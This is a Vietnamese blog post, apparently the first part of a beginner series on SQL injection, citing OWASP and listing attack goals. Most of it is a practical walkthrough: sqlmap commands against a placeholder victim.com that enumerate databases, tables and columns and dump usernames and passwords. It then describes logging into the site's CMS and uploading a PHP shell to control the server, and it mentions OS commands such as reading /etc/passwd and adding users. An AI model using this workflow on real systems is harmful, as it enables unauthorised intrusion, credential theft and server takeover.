<li>SQL Injection được <a href="https://www.owasp.org/">OWASP</a> (là một tổ chức phi lợi nhuận tại Mỹ chuyên nghiên cứu, đánh giá và phát triển những ứng dụng web) đánh giá với mức độ nguy hiểm cực kỳ cao và phương thức khai thác thì cực kỳ dễ @_@.</li>
<li>Bảng báo cáo đánh giá về những phương thức tấn công năm 2010 do OWASP xuất bản bạn có thể tham khảo tại  [<a href="http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202010.pdf" target="_blank">Tiếng Anh</a>]  [<a href="http://owasptop10.googlecode.com/files/OWASPTop%2010%20-%202010%20Vietnamese.pdf" target="_blank">Tiếng Việt</a>] </li>
</ul>
</div>
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRFg3atL-aLbD4DRIazFFGY0kzQiKBgNrl_F4a-qoL-eC9pd0Y7kETl4DjBT8IwpPNnJnL6tH28dZWpAdcL3MOjy-1VZt87ffjlBkVvtRWPtcCDj7QswQTNEgCACVKTaBltvG3-qstR6SR/s1600/owasp1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Khai Thác SQLi" border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRFg3atL-aLbD4DRIazFFGY0kzQiKBgNrl_F4a-qoL-eC9pd0Y7kETl4DjBT8IwpPNnJnL6tH28dZWpAdcL3MOjy-1VZt87ffjlBkVvtRWPtcCDj7QswQTNEgCACVKTaBltvG3-qstR6SR/s1600/owasp1.jpg" title="Khai Thác SQLi" width="640" /></a></div>
<h2>
I.Phân tích trước khi “xâm phạm server”</h2>

<h3>
10 điều “cần” và “phải” biết:</h3>

<ul>
<li>Identifying injectable parameters: tìm ra những tham số nào có thể là nguy cơ để mình khai thác (mình sẽ phân tích ở phần tiếp theo)</li>
<li>Performing database finger-printing: xác định Loại và Phiên bản của database để đưa ra hướng tấn công thích hợp (MySQL – MSSQL – MSAccess – Oracle ….)</li>
<li>Determining database schema: “database schema” hay có thể xem là CƠ SỞ DỮ LIỆU CỦA CƠ SỞ DỮ LIỆU >> database schema lưu trữ những thông tin về toàn bộ thông tin database của một server. Hoặc có thể hiểu rằng, database schema chứa tên user/password/quyền/số lượng cơ sở dữ liệu/…. (nhưng nó không chứa data của cơ sở dữ liệu.)
<ul>
<li>Ví dụ: Server của tôi có 5 databases (bao gồm minhtamnw1 minhtamnw2 
… minhtamnw5) và tương ứng có một cặp user/password tương ứng 
(user1/password1 …. user5/password5). Vậy những thông tin về số lượng 
database|user|password|quyền trên từng database|… sẽ được 
imfomation_schema trên MySQL lưu trữ. Vì vậy tìm ra “database schema” 
của từng loại Database là rất quan trọng.</li>
</ul>
</li>
<li>Extracting data: Đây chính thức là bước “ăn cắp thông tin” của server. Toàn bộ sẽ dần hiện ra $_$ – quan trọng là user|password để đăng nhập vào <a href="http://minhtamnw.wordpress.com/2012/05/16/cms/" target="_blank">CMS</a> của server. Tại bước này là Read-Only | chỉ có thể đọc toàn bộ cơ sở dữ liệu.</li>
<li>Adding or modifying data: bước này sẽ quyết định bạn có thể thêm bớt vào DB không | Xem hình dưới:</li>
</ul>

<img alt="" class="aligncenter" height="217" src="https://i0.wp.com/i1095.photobucket.com/albums/i463/aptx4869w/insertable.jpg" width="559" />

<div style="text-align: center;">
Ví dụ: Database là MySQL + WebPlatform là PHP = Kết quả: không thể ghi hoặc xóa lên database nạn nhân.</div>

<ul>
<li>Performing denial of service: Làm sập server thông qua lỗi SQLINjection (tham khảo <a href="http://www.rootrulerz.com/2011/07/anonymous-back-again-refref-for-dos.html" target="_blank">TẤN CÔNG THEO PHƯƠNG PHÁP REFREF</a>)</li>
<li>Evading detection: dùng những “cheat” để không bị phát hiện (detection) cững như bị ghi lại hoạt động (auditing)</li>
<li>Bypassing authentication: vượt quyền để có thể toàn quyền trên server.</li>
<li>Executing remote commands: Điểm đặc biệt của SQL-Injection là có thể thực thi command của OS.
<ul>
<li>Ví dụ: LINUX OS BASE: ls | cat /etc/passwd | useradd | … — WINDOWS OS BASE: net user | dir c:\ | query session | …</li>
</ul>
</li>
<li>Performing privilege escalation: Xác định quyền tối cao của current-user thông qua những lỗi mà server trả về. Bước  này ít quan trọng.</li>
</ul>

<h2>
II. Những phong cách “khai thác” của SQL-Injection</h2>

<h3>
Có 05 loại chính: BEUST</h3>

Boolean-based blind SQL injection, còn được biết như là inferential SQL injection. 

Error-based SQL injection. 

UNION query SQL injection. 

Stacked queries SQL injection. 

Time-based blind SQL injection, còn được biết như làs full blind SQL injection. 

Tùy vào mỗi loại sẽ có một phương pháp riêng để khai thác. Trong bài 
viết này, mình không tập trung nhiều vào cơ chế, mà sẽ tiếp tục qua phần
 khai thác thực tế. (Tham khảo thêm tại <a href="http://sqlmap.sourceforge.net/doc/README.html#ss1.3" target="_blank">ĐÂY</a>) 

<h2>
III.Tấn công thực tế</h2>

Toys (Tools): Trên nền tảng Windows 

PYTHON 2.6 hoặc 2.7 | DOWNLOAD: <a href="http://www.python.org/ftp/python/2.7.3/python-2.7.3.msi" target="_blank">Windows 32bits</a>  -  <a href="http://www.python.org/ftp/python/2.7.3/python-2.7.3.amd64.msi" target="_blank">Windows 64bits</a> 

SQLMAP | <a href="http://sqlmap.sourceforge.net/" target="_blank">DOWNLOAD</a> 

Cấu trúc URL: 

<blockquote>
<a href="https://minhtamnw.wordpress.com/wp-admin/post.php?post=32&action=edit&message=10" rel="nofollow">https://minhtamnw.wordpress.com/wp-admin/post.php?post=32&action=edit&message=10</a>

<ol><ul>
<li>https: Protocol</li>
<li>minhtamnw.wordpress.com: Tên miền</li>
<li>/wp-admin: đường dẫn</li>
<li>/post.php: Filename.Extention</li>
<li>? : sau dấu ? sẽ là biến và giá trị biến</li>
<li>post=32&action=edit&message=10  : biến post có giá trị 32, mỗi biến cách nhau bởi dấu &</li>
</ul>
</ol>
</blockquote>

Khai thác: Cài đặt Python và giải nén sqlmap vào C:\ như hình 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnROAe85zEkZeODpUp8em2ce6CZA4-VpJCgTsZ8eySTBhr9vsGrPu9zuz1nypgB5U1qZfRtgX1pWMcPA6H480WXxdL4dp89xdaGrIegpbY8HZhTBxLljJT9pJRGuNlu6lzg_qAw-ADy6hl/s1600/sqlmap.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Khai Thác SQLi" border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnROAe85zEkZeODpUp8em2ce6CZA4-VpJCgTsZ8eySTBhr9vsGrPu9zuz1nypgB5U1qZfRtgX1pWMcPA6H480WXxdL4dp89xdaGrIegpbY8HZhTBxLljJT9pJRGuNlu6lzg_qAw-ADy6hl/s1600/sqlmap.jpg" title="SQLi" width="640" /></a></div>
Victim: <a href="http://www.victim.com/content/banin.php?id=1" rel="nofollow">http://www.victim.com/content/banin.php?id=1</a> 

sqlmap.py -u “http://www.victim.com/content/banin.php?id=1″ -p id -v 3 –dbs –no-cast 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbxigNCS7nUz1HJp-q7OXJmkPU-XgQ7TANoznjFFPYKFLP9qlYU49e3xB0SUwstEk5PxDzYU3HUtJeYkr0pzHM12LAAGwN5g5fr0wMAwktacQW3jvA3rsKwG7mPQ3LkKc3fpajv1JPaJX5/s1600/attention2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbxigNCS7nUz1HJp-q7OXJmkPU-XgQ7TANoznjFFPYKFLP9qlYU49e3xB0SUwstEk5PxDzYU3HUtJeYkr0pzHM12LAAGwN5g5fr0wMAwktacQW3jvA3rsKwG7mPQ3LkKc3fpajv1JPaJX5/s1600/attention2.jpg" width="640" /></a></div>
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPs0RKwQO-ccePKKDKXdAe9BqUL4wvPvRVJtnFHpooNLQpY-kzhuIVabrDZ-Vsr5x5XxtHGmFpFuoNDIL23DF7XDgNziLVEME7v9c4hywAoiaIQ1ABiMCG9fcHCwWybzjGYQbrTwza4o6m/s1600/dbs2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPs0RKwQO-ccePKKDKXdAe9BqUL4wvPvRVJtnFHpooNLQpY-kzhuIVabrDZ-Vsr5x5XxtHGmFpFuoNDIL23DF7XDgNziLVEME7v9c4hywAoiaIQ1ABiMCG9fcHCwWybzjGYQbrTwza4o6m/s1600/dbs2.jpg" width="640" /></a></div>
 
sqlmap.py -u “http://www.victim.com/content/banin.php?id=1″ -p id -v 3 -D database_found –tables –no-cast 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsjN-pBz8QEQJUDaYHMiy7b9CzoHuIEFAQEPtTH3HUhSZRWX5nHupaixdn6-7nHm3sNUTjzjVKGBTmd70ks5k_Or5MX_EOa6OAV10lpCFfyTwbB5I3G-Y2i4ksNPJxE3u75UNlCfSSlUbk/s1600/tablesmisc.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsjN-pBz8QEQJUDaYHMiy7b9CzoHuIEFAQEPtTH3HUhSZRWX5nHupaixdn6-7nHm3sNUTjzjVKGBTmd70ks5k_Or5MX_EOa6OAV10lpCFfyTwbB5I3G-Y2i4ksNPJxE3u75UNlCfSSlUbk/s1600/tablesmisc.jpg" width="364" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP-HRiGovuGk5oRVUnXFWcMKYYV0-XdTpZL9pycjDK1ogVpOQiNx1DDe-_iKyysk7ltcPOmCYqpMdRs6w0lL6ecrP-CPXWkQ0po5xR4j10eYAEgFN3dBU95uEizq8OI7z0WNT4GYQ7rFrD/s1600/tables.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP-HRiGovuGk5oRVUnXFWcMKYYV0-XdTpZL9pycjDK1ogVpOQiNx1DDe-_iKyysk7ltcPOmCYqpMdRs6w0lL6ecrP-CPXWkQ0po5xR4j10eYAEgFN3dBU95uEizq8OI7z0WNT4GYQ7rFrD/s1600/tables.jpg" width="640" /></a></div>
 sqlmap.py -u “http://www.victim.com/content/banin.php?id=1″ -p id -v 3 -D database_found -Ttbl_user –columns –no-cast 
<img alt="" class="aligncenter" height="179" src="https://i0.wp.com/i1095.photobucket.com/albums/i463/aptx4869w/columns.jpg" width="520" /> 

sqlmap.py -u “http://www.victim.com/content/banin.php?id=1″ -p id -D  database_found -Ttbl_user –columns -C  user_name,user_password –dump –no-cast 

<img alt="" class="aligncenter" height="100" src="https://i0.wp.com/i1095.photobucket.com/albums/i463/aptx4869w/userpassword.jpg" width="520" /> 

Và bây giờ, chúng ta sẽ đăng nhập vào CMS của site nạn nhân và upload 1 shellcode_PHP để có thể điểu khiển được server 

<img alt="" class="aligncenter" height="272" src="https://i0.wp.com/i1095.photobucket.com/albums/i463/aptx4869w/shell-1.jpg" width="620" /> 

Kết quả: Sau khi tìm thấy lần lượt DATABASE > TABLE > COLUMNS > DATA ,
 ta có thể dùng chúng để đăng nhập và những CMS để thực hiện hành vi đen
 tối $_@. Trên đây chỉ là những hướng dẫn rất cơ bản để các bạn có thể 
hình dung được SQL INJECTION là gì và nó nguy hiểm như thế nào. Trong 
những bài viết tiếp theo, mình sẽ đi sâu hơn vào 10 điều “cần” và “phải” biết như đã đề cập ở đầu bài viết. 
 

còn tiếp…</div>

SQL Injection Attack part.1

Bạn chuẩn bị đọc một loại lỗ hổng nguy hiểm bậc nhất thế giới! | có hơn 9.680.000 kết quả do google trả về với từ khóa “ SQL Inj...